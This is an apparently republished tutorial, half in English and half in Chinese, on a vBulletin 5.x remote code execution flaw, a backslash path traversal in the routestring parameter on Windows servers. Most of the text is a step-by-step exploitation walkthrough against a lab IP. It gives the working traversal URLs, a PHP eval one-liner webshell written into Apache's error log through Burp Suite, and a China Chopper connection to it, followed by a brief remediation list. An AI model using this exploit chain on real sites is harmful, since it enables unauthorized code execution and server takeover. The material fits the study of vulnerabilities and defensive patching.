Example analysis of remote code execution vulnerability in vBulletin5.x version

1. Vulnerability introduction

There is a file inclusion issue in vBulletin that allows malicious visitors to include files from the vBulletin server and execute arbitrary PHP code. An unverified malicious visitor can trigger the file inclusion vulnerability by issuing a GET request containing the routestring= parameter to index.php, ultimately leading to a remote code execution vulnerability

2. Vulnerability principle

When the

index.php page sends a GET request to include a local file using the routestring parameter, it calls functional functions layer by layer to filter the routestring value. Let's look at the main processing code.

This code is located in /includes/vb5/frontend/routing.phpFile

if  (strlen($path)  >  2  )            {                $ext = strtolower(substr($path,  -4))  ;              if(($ext == '.gif') OR ($ext == '.png')OR($ext == '.jpg')  OR ($ext == '.css') OR (strtolower(substr($path,-3)) == '.js'))          {                header("HTTP/1.0 404 Not Found");            die('');          }    }

This code determines whether the value obtained by routestring is in .gif, .png, .jpg, .css or .js at the end, if so, then the header The information returns 404

if  (strpos($path,  '/')  ===  false)            {                $this->controller  =  'relay';              $this->action  =  'legacy';              $this->template  =  '';              $this->arguments  =  array($path);              $this->queryParameters  =  array();              return;          }

The strpos() function in this code returns the position where the / character first appears in $path, Processing will continue only if the returned information is false, which means / cannot appear in the path.

For Linux servers, when processing URLs, / represents the separator and indicator of the directory layer, so other files in the website cannot be included in the form of multiple ../. However, for Windows servers, / and \ are equivalent when expressing paths, and the program does not process \, which leads to this file inclusion vulnerability for Windows servers.

Affected version

Version number vBulletin v5.x version The discoverer of the vulnerability has contacted the manufacturer but has not yet received a reply

3. Vulnerability Exploitation

In the next practical part, we will gradually deepen the understanding and utilization of the vulnerability. First, use the page to report errors and obtain server-related information; then include the internal files of the server and execute phpinfo() to verify the code execution; and finally include Write a sentence in PHP to the website log file to obtain website management permissions.

Step 1 Vulnerability verification

In this step, we simply use the error report to obtain the server information, and then use the vulnerability to include the execution of the phpinfo() function for verification

1. Open the target URL 172.16.12.2/vb5/index.php, the homepage of the website is as follows:

2. Visit the vulnerability page and view the error message

Open 172.16 in the browser .12.2/vb5/index.php?routestring=.\\, the error message is as follows:

You can see that the page uses require_once() to include the current path (C:\phpstudy\ WWW\vb5/core/.\\) is not allowed and an error is reported. The error message leaks the absolute path of the website and the website building software: phpstudy

phpstudy When building a website, by default it will be left in the root directory of the website. Next, l.php and phpinfo.php files. Usually website administrators will delete or modify these two files because \ also has the meaning of escaping, and \\ and \ are equivalent when expressing paths, so we use \\ to prevent Escaped (this experiment can also be completed)

3. Access the phpinfo.txt file

In order to verify that the vulnerability is contained, there is a phpinfo.txt file in the root directory of the website , the content is , we try to access the file directly, http://172.16.12.2/phpinfo.txt

website directly The text content is displayed

4. Include the phpinfo.txt file

We then try to include the file and open the constructed linkhttp://172.16.12.2/vb5/index .php?routestring=\\..\\..\\..\\..\\..\\..\\phpstudy\\WWW\\phpinfo.txt

Here we already know the absolute path of the website on the server, so we use multiple ..\\ plus the file path to indicate the website path of the included file. After including the file, the server will It is parsed as a php file and the phpinfo() function is executed.

phpinfo(): PHP built-in function, outputs the configuration information of the PHP server

Step 2 Vulnerability Exploitation

Generally, PHP The method of exploiting file inclusion vulnerabilities is to first use the website upload point to upload files containing malicious code, then find the uploaded file path, construct the URL, and execute the malicious code by including the vulnerability. However, this method will not work if there is no upload point available on the website itself, or if there are restrictions on the uploaded files so that we cannot know the path of the files, or if the parameters obtained during input are filtered.

It can be seen from the above that the program has restrictions on the included file suffixes. In the absence of other uses, we can choose to include the files that exist on the website itself, which is the way of use in this experiment: include Website log files

本次包含的是Apache的错误访问日志（error.log）,这个日志文件在phpstudy中的路径为: \phpstudy\apache\logs\error.log。

1.将一句话写入日志记录

首先，我们构造一个会报错的访问链接，将利用代码（PHP一句话）写入错误日志记录中。

http://172.16.12.2/vb5/index.php<?php  @eval($_POST[c]);?>

这个链接直接访问的话，一句话会被编码成%3C?php%20@eval($_POST[c]);?%3E，所以需要使用Burp suite改一下包。

使用Everything搜索BurpLoader.jar，双击打开工具Burp suite。

配置浏览器的代理设置：

打开桌面的chrome浏览器，访问chrome://settings或者点击浏览器右侧的自定义按钮--》设置，进入设置界面

点击下方的显示高级设置,找到更改代理服务器设置按钮并打开，在弹出的设置中选择局域网设置

具体配置如下图，修改后确定

配置完代理后，在浏览器中访问上述构造的链接，Burpsuite接受到数据包会自动截获，打开Burpsuite--》proxy--》Intercept，在下方文本框中，右击并选择Send to Repeater，随后点击Repeter功能按钮，对所截获的包进行修改。

我们将被编码的链接改回编码之前的状态，修改后的内容如下：

点击 Go按钮发送，返回403报错，服务器错误日志文件成功将此次记录到error.log中

我们已经成功的将利用代码写入日志中了

注意利用代码的正确性，如果写入错误的代码可能会导致后续包含时，代码不能成功执行

现在，将Burpsuite关闭，并按照上述设置浏览器代理的方法关闭代理

2.构造Webshell连接地址

们根据日志的路径构造访问路径:

http://172.16.12.2/vb5/index.php?routestring=\\..\\..\\..\\..\\..\\..\\phpstudy\\apache\\logs\\error.log

1. 客户端连接一句话

接下来就使用中国菜刀连接我们的一句话，使用Everything搜索并打开chopper,右击，选择添加，在地址栏内填入我们构造好的链接，右侧写入密码c,类型选择 PHP（Eval）,然后点击添加。

双击链接，连接成功（此处如果连接不上请检查写入的代码是否正确，代理是否关闭）

包含日志文件需要确定的服务器日志路径，通常管理员会修改相关配置，而且写入代码时需要注意严格的格式和编码，所以这种方法不作为优选利用方法，但是在没有其他利用点的情况下，也是可以尝试的

修复方案

• (1) 等待官方发布补丁，个人用户建议采用可替代的相关产品
  

• (2) 企业用户可修改网站源代码，增加\字符的过滤处理
  

• (3) 网站管理人员可以修改服务器本身敏感信息文件位置，避免漏洞的进一步利用

The above is the detailed content of Example analysis of remote code execution vulnerability in vBulletin5.x version. For more information, please follow other related articles on the PHP Chinese website!